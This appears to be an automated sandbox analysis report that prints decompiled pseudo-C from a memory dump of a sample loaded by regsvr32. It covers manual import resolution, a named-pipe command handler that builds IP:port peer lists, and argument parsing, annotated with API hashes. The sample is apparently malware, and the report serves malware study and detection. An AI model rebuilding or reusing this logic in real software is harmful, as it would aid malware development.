              							_push(_t116);
              							_t157 = E0073A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
              							_t170 = _t169 + 0x10;
              							__eflags = _t157;
              							if(_t157 == 0) {
              								goto L36;
              							}
              							_push(0x74ca26);
              							_t146 = 0xe;
              							E0073AC36(_t146, _t175);
              							E0073AC6F(_t157, _t175, _t101);
              							_t163 = _a4;
              							_push( *_t163);
              							E0073AC11(0xb);
              							_t148 =  *(_t163 + 0x10);
              							__eflags =  *(_t163 + 0x10);
              							if( *(_t163 + 0x10) != 0) {
              								E0073B1B1(_t148, _t175);
              							}
              							_t149 =  *(_t163 + 0xc);
              							__eflags = _t149;
              							if(_t149 != 0) {
              								E0073B1B1(_t149, _t175);
              							}
              							_t65 = E0073A1F8(0);
              							_push(_t149);
              							_t150 = 2;
              							_t66 = E0073ABE3();
              							__eflags = _v592;
              							_t127 = _t65;
              							if(_v592 == 0) {
              								_t127 =  *0x74f8d4; // 0xc2fc00
              								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
              								if(__eflags != 0) {
              									_t67 = E00740DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
              									_t170 = _t170 + 0xc;
              									goto L21;
              								}
              								_t127 = _t127 + 0x228;
              								goto L20;
              							} else {
              								_t68 =  *0x74f8d4; // 0xc2fc00
              								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
              								if(__eflags != 0) {
              									L27:
              									__eflags =  *(_t68 + 0x1898) & 0x00000082;
              									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
              										_t152 = 0x64;
              										E0073F15B(_t152);
              									}
              									E0073565D( &_v580, _t175);
              									_t159 = _a8;
              									_t128 = _t127;
              									__eflags = _t159;
              									if(_t159 != 0) {
              										_t71 =  *0x74f8d4; // 0xc2fc00
              										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
              										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
              											lstrcpyW(_t159, _t101);
              										} else {
              											_t73 = E0073109A(_t128, 0x153);
              											_v596 = _t73;
              											lstrcpyW(_t159, _t73);
              											E00738D9A( &_v596);
              											 *_t170 = "\"";
              											lstrcatW(_t159, ??);
              											lstrcatW(_t159, _t101);
              											lstrcatW(_t159, "\"");
              										}
              									}
              									_t70 = _a12;
              									__eflags = _t70;
              									if(_t70 != 0) {
              										 *_t70 = _v588;
              									}
              									_t161 = 0;
              									__eflags = 0;
              									goto L36;
              								}
              								_t32 = _t68 + 0x228; // 0xc2fe28
              								_t127 = _t32;
              								L20:
              								_t67 = E007358D2(_t127, _t101, __eflags);
              								L21:
              								__eflags = _t67;
              								if(_t67 >= 0) {
              									_t68 =  *0x74f8d4; // 0xc2fc00
              									goto L27;
              								}
              								_push(0xfffffffd);
              								L6:
              								_pop(_t161);
              								goto L36;
              							}
              						}
              						_t83 = E0073D210(_v588, __eflags);
              						_v596 = _t83;
              						_t84 =  *0x74f8d0; // 0xc2f8c0
              						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
              						__eflags = _t85 - _t161;
              						if(_t85 != _t161) {
              							_t86 =  *0x74f8d0; // 0xc2f8c0
              							 *((intOrPtr*)(_t86 + 0x30))();
              							E00738DDF( &_v632, _t161);
              							_t116 = _t85;
              							goto L12;
              						}
              						E00738DDF( &_v628, _t161);
              						_t61 = 1;
              						goto L37;
              					}
              					_push(0xfffffffe);
              					goto L6;
              				} else {
              					_t93 = E0073308A( &_v532, _t161, 0x105);
              					_t173 = _t93;
              					if(_t93 == 0) {
              						L36:
              						_t61 = _t161;
              						L37:
              						return _t61;
              					}
              					goto L4;
              				}
              			}

              APIs
              • memset.MSVCRT ref: 00735061
              • lstrcpyW.KERNEL32 ref: 007352C7
              • lstrcatW.KERNEL32(00000000,?), ref: 007352E5
              • lstrcatW.KERNEL32(00000000,00000000), ref: 007352E9
              • lstrcatW.KERNEL32(00000000,0074CA28), ref: 007352F1
                • Part of subcall function 00738DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00738E25
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$FreeHeaplstrcpymemset
              • String ID:
              • API String ID: 911671052-0
              • Opcode ID: c8823fe72357ff9649d04213804174a5bf20ff4974929a163a7763e9d560315f
              • Instruction ID: 21cfa8d5a6d3733e21fd77fbe5f733fd3878598a26947d0feca64208e2c6695f
              • Opcode Fuzzy Hash: c8823fe72357ff9649d04213804174a5bf20ff4974929a163a7763e9d560315f
              • Instruction Fuzzy Hash: DF710E72700305ABE314EB24DC4AB7B73EAAF85710F14452EF5569B293EB7C9D048B92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E0073DEAB(WCHAR* __ecx) {
              				int _v8;
              				WCHAR* _v12;
              				WCHAR* _v16;
              				WCHAR* _v140;
              				WCHAR* _v144;
              				short _v664;
              				signed int _t28;
              				signed int _t29;
              				signed int _t30;
              				WCHAR* _t36;
              				int _t40;
              				signed int _t41;
              				int _t44;
              				signed int _t45;
              				WCHAR* _t49;
              				signed int _t51;
              				WCHAR* _t52;
              				void* _t53;
              
              				_v8 = _v8 & 0x00000000;
              				_v16 = __ecx;
              				_t51 = 0;
              				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
              				_t44 = _v8;
              				_t41 = 0;
              				_v12 = _t28;
              				if(_t44 <= 0) {
              					L22:
              					_t29 = _t28 | 0xffffffff;
              					__eflags = _t29;
              					return _t29;
              				} else {
              					goto L1;
              				}
              				do {
              					L1:
              					_t49 =  *(_t28 + _t41 * 4);
              					_t30 =  *_t49 & 0x0000ffff;
              					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
              						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
              						_t40 = lstrlenW(_t49);
              						_t45 = 0;
              						if(_t40 <= 0) {
              							L11:
              							_t44 = _v8;
              							_t51 = _t51 + 1;
              							goto L12;
              						} else {
              							goto L8;
              						}
              						do {
              							L8:
              							if(_t49[_t45] == 0x2c) {
              								_t49[_t45] = 0;
              							}
              							_t45 = _t45 + 1;
              						} while (_t45 < _t40);
              						goto L11;
              					}
              					L12:
              					_t28 = _v12;
              					_t41 = _t41 + 1;
              				} while (_t41 < _t44);
              				if(_t51 != 1) {
              					if(__eflags <= 0) {
              						goto L22;
              					}
              					_t52 = _v140;
              					L17:
              					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
              						lstrcpynW(_v16, _t52, 0x104);
              					} else {
              						GetCurrentDirectoryW(0x104,  &_v664);
              						_push(0);
              						_push(_t52);
              						_push(0x74c9d8);
              						_t36 = E00739C50( &_v664);
              						_v12 = _t36;
              						lstrcpynW(_v16, _t36, 0x104);
              						E00738DDF( &_v12, 0xfffffffe);
              					}
              					return 0;
              				}
              				_t52 = _v144;
              				goto L17;
              			}

              APIs
              • GetCommandLineW.KERNEL32 ref: 0073DEC0
              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0073DECB
              • lstrlenW.KERNEL32 ref: 0073DF0D
              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0073DF66
              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0073DF8B
              • lstrcpynW.KERNEL32(?,?,00000104), ref: 0073DFA9
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
              • String ID:
              • API String ID: 1259063344-0
              • Opcode ID: 95d9f4912328ea1c9984677be855ad250a9244e2e1469fea33de23ef6288cd60
              • Instruction ID: 693ed952d6f0ff00972eac3dae8140b7e987632882804154d77b2d7503db2025
              • Opcode Fuzzy Hash: 95d9f4912328ea1c9984677be855ad250a9244e2e1469fea33de23ef6288cd60
              • Instruction Fuzzy Hash: 7431B575D0011AEBEF349B55E8C8AAEB7B8EF45310F10415AE527E61A1EB789D808B50
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SysAllocString.OLEAUT32(00000000), ref: 0073E6ED
              • SysAllocString.OLEAUT32(?), ref: 0073E6F5
              • SysAllocString.OLEAUT32(00000000), ref: 0073E709
              • SysFreeString.OLEAUT32(?), ref: 0073E784
              • SysFreeString.OLEAUT32(?), ref: 0073E787
              • SysFreeString.OLEAUT32(?), ref: 0073E78C
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: String$AllocFree
              • String ID:
              • API String ID: 344208780-0
              • Opcode ID: e2270ed45a0984f2b871523a213c41425c1b73204eed3b8806fedaca0098373e
              • Instruction ID: 7450dbcb29d6c351f56a2a61c71905d3372d0793d5482f2e54d42fcaf3b4c109
              • Opcode Fuzzy Hash: e2270ed45a0984f2b871523a213c41425c1b73204eed3b8806fedaca0098373e
              • Instruction Fuzzy Hash: DF211975900219FFDB00DFA4CC88DAFBBBDEF88354B2044AAF505A7251DA75AE01CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: @$\u%04X$\u%04X\u%04X
              • API String ID: 0-2132903582
              • Opcode ID: e48fc4361ef91eaa1bbdec73084928d5391fa257f5fd87b46e6f61cef7b08dab
              • Instruction ID: e6d1dd71cba118fedb4a834e66c941a44964782c46e5240ee1eea40e12e657cf
              • Opcode Fuzzy Hash: e48fc4361ef91eaa1bbdec73084928d5391fa257f5fd87b46e6f61cef7b08dab
              • Instruction Fuzzy Hash: 1141E8B174020A97DF24BD6C8D9EABF3614DF41710F94412AFE16D6A40E36DCDD0D291
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 83%
              			E007433DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
              				signed int _t12;
              				signed int _t13;
              				signed int _t23;
              				void* _t30;
              				char* _t31;
              				char* _t33;
              				char* _t35;
              				char* _t37;
              				char* _t38;
              				long long* _t40;
              
              				_t30 = __edi;
              				_t12 = _a20;
              				if(_t12 == 0) {
              					_t12 = 0x11;
              				}
              				_t35 = _a4;
              				_push(_t25);
              				 *_t40 = _a12;
              				_push(_t12);
              				_push("%.*g");
              				_push(_a8);
              				_push(_t35);
              				L00743533();
              				_t23 = _t12;
              				if(_t23 < 0 || _t23 >= _a8) {
              					L16:
              					_t13 = _t12 | 0xffffffff;
              					goto L17;
              				} else {
              					E007433B3(_t12, _t35);
              					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
              						L8:
              						_push(_t30);
              						_t37 = strchr(_t35, 0x65);
              						_t31 = _t37;
              						if(_t37 == 0) {
              							L15:
              							_t13 = _t23;
              							L17:
              							return _t13;
              						}
              						_t38 = _t37 + 1;
              						_t33 = _t31 + 2;
              						if( *_t38 == 0x2d) {
              							_t38 = _t33;
              						}
              						while( *_t33 == 0x30) {
              							_t33 = _t33 + 1;
              						}
              						if(_t33 != _t38) {
              							E00738ECB(_t38, _t33, _t23 - _t33 + _a4);
              							_t23 = _t23 + _t38 - _t33;
              						}
              						goto L15;
              					} else {
              						_t6 = _t23 + 3; // 0x741bc5
              						_t12 = _t6;
              						if(_t12 >= _a8) {
              							goto L16;
              						}
              						_t35[_t23] = 0x302e;
              						( &(_t35[2]))[_t23] = 0;
              						_t23 = _t23 + 2;
              						goto L8;
              					}
              				}
              			}

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: strchr$_snprintf
              • String ID: %.*g
              • API String ID: 3619936089-952554281
              • Opcode ID: b99d6b85e131cc753bc83a47c1f31d40d6aa6adb4d64de80687aff47ca20bd42
              • Instruction ID: 55112ebdcb4d469c30cdde637fc9fec0d25151d1473b455e52bed121a7813dff
              • Opcode Fuzzy Hash: b99d6b85e131cc753bc83a47c1f31d40d6aa6adb4d64de80687aff47ca20bd42
              • Instruction Fuzzy Hash: 0421246264469567EB229E2DEC8AFFF77989F12720F144125F94C8A181E7AC9F4043D1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 62%
              			E00733775(void* __fp0) {
              				signed int _v144;
              				signed int _v152;
              				char _v160;
              				char _v164;
              				char _v168;
              				signed int _v172;
              				char _v176;
              				intOrPtr _v180;
              				signed int _v184;
              				signed int _v188;
              				signed int _v192;
              				signed int _v196;
              				char _v200;
              				signed int _v204;
              				intOrPtr _t72;
              				intOrPtr _t75;
              				signed int _t80;
              				signed int _t81;
              				signed int _t84;
              				signed int _t87;
              				signed int _t88;
              				signed int _t100;
              				void* _t102;
              				void* _t103;
              				unsigned int* _t104;
              				signed int _t110;
              				signed int _t113;
              				void* _t118;
              				intOrPtr _t124;
              				signed int _t127;
              				intOrPtr _t129;
              				intOrPtr _t132;
              				void* _t133;
              				void* _t136;
              				signed int _t145;
              				signed int _t147;
              				signed short* _t148;
              				signed int _t158;
              				intOrPtr* _t182;
              				void* _t186;
              				void* _t187;
              				void* _t188;
              				signed short* _t191;
              				void* _t195;
              				signed int _t198;
              				signed int _t199;
              				signed int _t203;
              				signed int _t204;
              				char _t205;
              				signed int _t207;
              				void* _t209;
              				void* _t215;
              				void* _t222;
              
              				_t222 = __fp0;
              				_t209 = (_t207 & 0xfffffff8) - 0xac;
              				_v144 = 0;
              				_v172 = 0;
              				while(1) {
              					_t72 =  *0x74f8d0; // 0xc2f8c0
              					_push(0);
              					_push( *0x74f8b4);
              					_v152 = 0;
              					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
              						break;
              					}
              					_push(0);
              					_push( &_v160);
              					_t75 =  *0x74f8d0; // 0xc2f8c0
              					_push(0x80000);
              					_push( *0x74f974);
              					_push( *0x74f8b4);
              					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
              						GetLastError();
              						goto L56;
              					} else {
              						_t148 =  *0x74f974; // 0x0
              						_t80 =  *_t148 & 0x0000ffff;
              						_t215 = _t80 - 8;
              						if(_t215 > 0) {
              							_t81 = _t80 - 9;
              							__eflags = _t81;
              							if(_t81 == 0) {
              								E007409C3( &_v200);
              								L12:
              								_t84 =  &_v200;
              								L13:
              								_push(4);
              								L14:
              								_push(_t84);
              								_push(5);
              								L31:
              								_pop(_t186);
              								E0073D297(_t186);
              								L32:
              								L56:
              								DisconnectNamedPipe( *0x74f8b4);
              								_push(0);
              								_pop(0);
              								_push(1);
              								_pop(1);
              								if(_v172 == 0) {
              									continue;
              								}
              								break;
              							}
              							_t87 = _t81;
              							__eflags = _t87;
              							if(_t87 == 0) {
              								_v204 = 0;
              								_t88 = E007316B0( &_v204, _t222);
              								_v188 = _t88;
              								__eflags = _t88;
              								if(_t88 == 0) {
              									_push(4);
              									_v192 = 0;
              									_push( &_v192);
              									L19:
              									_push(0xa);
              									goto L31;
              								}
              								_t145 = _v204;
              								_t90 = _t145 * 0x16;
              								_v184 = _t145 * 0x16;
              								_t203 = E00738DC9(_t90);
              								_v192 = _t203;
              								__eflags = _t203;
              								if(_t203 == 0) {
              									_t64 =  &_v192;
              									 *_t64 = _v192 & 0x00000000;
              									__eflags =  *_t64;
              									_push(4);
              									_push( &_v192);
              									_t187 = 0xa;
              									E0073D297(_t187);
              									L52:
              									E00738DDF( &_v188, _t145);
              									goto L32;
              								}
              								_t198 = 0;
              								__eflags = _t145;
              								if(_t145 == 0) {
              									L50:
              									_push(E0073A5D0(_t203));
              									_push(_t203);
              									_t188 = 5;
              									E0073D297(_t188);
              									E00738DDF( &_v192, 0xffffffff);
              									_t209 = _t209 + 0x10;
              									goto L52;
              								}
              								_t158 = _v188 + 4;
              								__eflags = _t158;
              								_v204 = _t158;
              								do {
              									__eflags = _t198;
              									if(_t198 != 0) {
              										__eflags = _t198 - _t145 - 1;
              										if(_t198 < _t145 - 1) {
              											_t102 = E0073A5D0(_t203);
              											_t158 = _v204;
              											 *((short*)(_t102 + _t203)) = 0x3b;
              										}
              									}
              									_t100 =  *_t158;
              									_v196 = _t100;
              									__eflags = _t100;
              									if(_t100 != 0) {
              										_t103 = E0073A5D0(_t203);
              										_t104 = _v204;
              										_push(_t104[1] & 0x0000ffff);
              										_push( *_t104 >> 0x18);
              										_push(_t104[0] & 0x000000ff);
              										_push(_t104[0] & 0x000000ff);
              										_t110 = E0073A5D0(_t203) + _t203;
              										__eflags = _t110;
              										E00739FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
              										_t158 = _v204;
              										_t209 = _t209 + 0x20;
              									}
              									_t198 = _t198 + 1;
              									_t158 = _t158 + 0x20;
              									_v204 = _t158;
              									__eflags = _t198 - _t145;
              								} while (_t198 < _t145);
              								goto L50;
              							}
              							__eflags = _t87 != 1;
              							if(_t87 != 1) {
              								goto L56;
              							}
              							_v204 = 0;
              							_t113 = E007316B0( &_v204, _t222);
              							_t204 = _v204;
              							_v196 = _t113;
              							__eflags = _t113;
              							if(_t113 != 0) {
              								E00738DDF( &_v196, _t204);
              							}
              							_v204 = _t204 * 0x16;
              							_t84 =  &_v204;
              							goto L13;
              						}
              						if(_t215 == 0) {
              							_t84 = E007409C3( &_v200);
              							L16:
              							__eflags = _t84;
              							if(_t84 == 0) {
              								_push(0);
              								_push(0);
              								goto L19;
              							}
              							_push(_v200);
              							goto L14;
              						}
              						_t118 = _t80 - 1;
              						if(_t118 == 0) {
              							_t199 = E00739D29( &(_t148[4]), 0x20, 1,  &_v176);
              							_v196 = _t199;
              							__eflags = _t199;
              							if(_t199 == 0) {
              								L30:
              								_t191 =  *0x74f974; // 0x0
              								E0073A06E( &_v164,  &(_t191[4]), 0x80);
              								_push(0x84);
              								_push( &_v168);
              								_push(2);
              								goto L31;
              							}
              							_t205 = _v176;
              							__eflags = _t205 - 1;
              							if(__eflags <= 0) {
              								_t124 = E00731D97(E0073A102( *_t199, __eflags), 0, 0, 0);
              								_t209 = _t209 + 0x10;
              								_v168 = _t124;
              								goto L30;
              							}
              							_t125 = _t205 - 1;
              							_v184 = _t205 - 1;
              							_t127 = E00738DC9(_t125 << 2);
              							_v188 = _t127;
              							__eflags = _t127;
              							if(_t127 == 0) {
              								goto L30;
              							}
              							_t147 = 1;
              							__eflags = _t205 - 1;
              							if(__eflags <= 0) {
              								L28:
              								_t129 = E00731D97(E0073A102( *_t199, __eflags), _t127, _v184, 0);
              								_t209 = _t209 + 0x10;
              								_v168 = _t129;
              								E00739E22( &_v176);
              								goto L30;
              							}
              							_v204 = _t127;
              							do {
              								_t132 = E00739A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0073A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
              								_t182 = _v204;
              								_t147 = _t147 + 1;
              								 *_t182 = _t132;
              								_v204 = _t182 + 4;
              								__eflags = _t147 - _t205;
              							} while (__eflags < 0);
              							_t127 = _v188;
              							goto L28;
              						}
              						_t133 = _t118 - 3;
              						if(_t133 == 0) {
              							_push(0);
              							_push(0);
              							_t195 = 5;
              							E0073D297(_t195);
              							 *0x74f9a8 = 1;
              							_v172 = 1;
              							goto L56;
              						}
              						_t136 = _t133;
              						if(_t136 == 0) {
              							_t84 = E007409A1( &_v200);
              							goto L16;
              						}
              						if(_t136 != 1) {
              							goto L56;
              						}
              						E007409A1( &_v200);
              						goto L12;
              					}
              				}
              				return 0;
              			}

              APIs
              • GetLastError.KERNEL32 ref: 007337AB
                • Part of subcall function 0073D297: FlushFileBuffers.KERNEL32(00000000,?,00733ABB,00000000,00000004), ref: 0073D2DD
              • DisconnectNamedPipe.KERNEL32 ref: 00733AF8
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
              • String ID: %u.%u.%u.%u:%u
              • API String ID: 465096328-3858738763
              • Opcode ID: 9f5410a866cfaf336270577ba830f64000211f9d98177bf0e3a0e21c7e8bac0d
              • Instruction ID: 5b7b3e3b8be2116c590ca9ae191e7470d6a24ae17c296175977b28b92a254cb0
              • Opcode Fuzzy Hash: 9f5410a866cfaf336270577ba830f64000211f9d98177bf0e3a0e21c7e8bac0d
              • Instruction Fuzzy Hash: E1A1C272508301EFF324DF64D889A6BB7E8EF84314F14892EF59587182EB7CDA058B56
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E0074376C(signed int __eax, void* __ecx, intOrPtr _a4) {
              				intOrPtr* _v8;
              				signed int* _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				signed int _v28;
              				intOrPtr _v32;
              				struct HINSTANCE__* _v36;
              				intOrPtr _v40;
              				signed int _v44;
              				struct HINSTANCE__* _v48;
              				intOrPtr _v52;
              				signed int _v56;
              				intOrPtr _v60;
              				signed int _v64;
              				signed int _t109;
              				signed int _t112;
              				signed int _t115;
              				void* _t163;
              				void* _t167;
              
              				_t167 = __ecx;
              				_v44 = _v44 & 0x00000000;
              				if(_a4 != 0) {
              					_v48 = GetModuleHandleA("kernel32.dll");
              					_v40 = E0073F024(_t167, _v48, "GetProcAddress");
              					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
              					_v32 = _v52;
              					_t109 = 8;
              					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
              						L24:
              						return 0;
              					}
              					_v56 = 0x80000000;
              					_t112 = 8;
              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
              						_v8 = _v8 + 0x14;
              					}
              					_t115 = 8;
              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
              						_t34 = _v8 + 0xc; // 0xffff
              						_v36 = LoadLibraryA( *_t34 + _a4);
              						if(_v36 != 0) {
              							if( *_v8 == 0) {
              								_t43 = _v8 + 0x10; // 0xb8
              								_v12 =  *_t43 + _a4;
              							} else {
              								_v12 =  *_v8 + _a4;
              							}
              							_v28 = _v28 & 0x00000000;
              							while( *_v12 != 0) {
              								_v24 = _v24 & 0x00000000;
              								_v16 = _v16 & 0x00000000;
              								_v64 = _v64 & 0x00000000;
              								_v20 = _v20 & 0x00000000;
              								if(( *_v12 & _v56) == 0) {
              									_v60 =  *_v12 + _a4;
              									_v20 = _v60 + 2;
              									_t73 = _v8 + 0x10; // 0xb8
              									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
              									_v16 = _v40(_v36, _v20);
              								} else {
              									_v24 =  *_v12;
              									_v20 = _v24 & 0x0000ffff;
              									_v16 = _v40(_v36, _v20);
              								}
              								if(_v24 != _v16) {
              									_v44 = _v44 + 1;
              									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
              										 *_v12 = _v16;
              									} else {
              										_t89 = _v8 + 0x10; // 0xb8
              										 *( *_t89 + _a4 + _v28) = _v16;
              									}
              								}
              								_v12 =  &(_v12[1]);
              								_v28 = _v28 + 4;
              							}
              							_v8 = _v8 + 0x14;
              							continue;
              						}
              						_t163 = 0xfffffffd;
              						return _t163;
              					}
              					goto L24;
              				}
              				return __eax | 0xffffffff;
              			}

              APIs
              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00743789
              • LoadLibraryA.KERNEL32(00000000), ref: 00743822
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: HandleLibraryLoadModule
              • String ID: GetProcAddress$kernel32.dll
              • API String ID: 4133054770-1584408056
              • Opcode ID: 395b7ce2dc5178c3de679385d202ea570d36168c5c7f22c7c888e455f90f1d84
              • Instruction ID: 095df1f3b1668eaa056dd43cd5ede3a9522e0824e1b97904f75cc790fc057508
              • Opcode Fuzzy Hash: 395b7ce2dc5178c3de679385d202ea570d36168c5c7f22c7c888e455f90f1d84
              • Instruction Fuzzy Hash: DA618D75D00209EFDB00CF98C985BADBBF1FF08315F248599E855AB2A1D378AA80DF50
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0073E9E3
              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0073E9F2
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: ArrayBoundSafe
              • String ID: ks
              • API String ID: 62119774-4038699377
              • Opcode ID: f1e9deb529376a894b01802262160690e0dd187b2448e26d541ea72c89b5f792
              • Instruction ID: 09d7cc169fd14443511f3cc9ecbe9995f10c90392592209445f14a6af1cb791c
              • Opcode Fuzzy Hash: f1e9deb529376a894b01802262160690e0dd187b2448e26d541ea72c89b5f792
              • Instruction Fuzzy Hash: BD31A372E5121EAFFB20CA94CC46BFEB779BB04700F148456F605A22D3D7B8AA449791
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 99%
              			E00744160(int _a4, signed int _a8) {
              				int _v8;
              				intOrPtr _v12;
              				signed int _v16;
              				void* __esi;
              				void* _t137;
              				signed int _t141;
              				intOrPtr* _t142;
              				signed int _t145;
              				signed int _t146;
              				intOrPtr _t151;
              				intOrPtr _t161;
              				intOrPtr _t162;
              				intOrPtr _t167;
              				intOrPtr _t170;
              				signed int _t172;
              				intOrPtr _t173;
              				int _t184;
              				intOrPtr _t185;
              				intOrPtr _t188;
              				signed int _t189;
              				void* _t195;
              				int _t202;
              				int _t208;
              				intOrPtr _t217;
              				signed int _t218;
              				int _t219;
              				intOrPtr _t220;
              				signed int _t221;
              				signed int _t222;
              				int _t224;
              				int _t225;
              				signed int _t227;
              				intOrPtr _t228;
              				int _t232;
              				int _t234;
              				signed int _t235;
              				int _t239;
              				void* _t240;
              				int _t245;
              				int _t252;
              				signed int _t253;
              				int _t254;
              				void* _t257;
              				void* _t258;
              				int _t259;
              				intOrPtr _t260;
              				int _t261;
              				signed int _t269;
              				signed int _t271;
              				intOrPtr* _t272;
              				void* _t273;
              
              				_t253 = _a8;
              				_t272 = _a4;
              				_t3 = _t272 + 0xc; // 0x452bf84d
              				_t4 = _t272 + 0x2c; // 0x8df075ff
              				_t228 =  *_t4;
              				_t137 =  *_t3 + 0xfffffffb;
              				_t229 =  <=  ? _t137 : _t228;
              				_v16 =  <=  ? _t137 : _t228;
              				_t269 = 0;
              				_a4 =  *((intOrPtr*)( *_t272 + 4));
              				asm("o16 nop [eax+eax]");
              				while(1) {
              					_t8 = _t272 + 0x16bc; // 0x5d08408b
              					_t141 =  *_t8 + 0x2a >> 3;
              					_v12 = 0xffff;
              					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
              					if(_t217 < _t141) {
              						break;
              					}
              					_t11 = _t272 + 0x6c; // 0x51ec8b55
              					_t12 = _t272 + 0x5c; // 0xee85000
              					_t245 =  *_t11 -  *_t12;
              					_v8 = _t245;
              					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
              					_t247 =  <  ? _t195 : _v12;
              					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
              					if(_t227 >= _v16) {
              						L7:
              						if(_t253 != 4) {
              							L10:
              							_t269 = 0;
              							__eflags = 0;
              						} else {
              							_t285 = _t227 - _t195;
              							if(_t227 != _t195) {
              								goto L10;
              							} else {
              								_t269 = _t253 - 3;
              							}
              						}
              						E00747180(_t272, _t272, 0, 0, _t269);
              						_t18 = _t272 + 0x14; // 0xc703f045
              						_t19 = _t272 + 8; // 0x8d000040
              						 *( *_t18 +  *_t19 - 4) = _t227;
              						_t22 = _t272 + 0x14; // 0xc703f045
              						_t23 = _t272 + 8; // 0x8d000040
              						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
              						_t26 = _t272 + 0x14; // 0xc703f045
              						_t27 = _t272 + 8; // 0x8d000040
              						 *( *_t26 +  *_t27 - 2) =  !_t227;
              						_t30 = _t272 + 0x14; // 0xc703f045
              						_t31 = _t272 + 8; // 0x8d000040
              						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
              						E00745EE0(_t285,  *_t272);
              						_t202 = _v8;
              						_t273 = _t273 + 0x14;
              						if(_t202 != 0) {
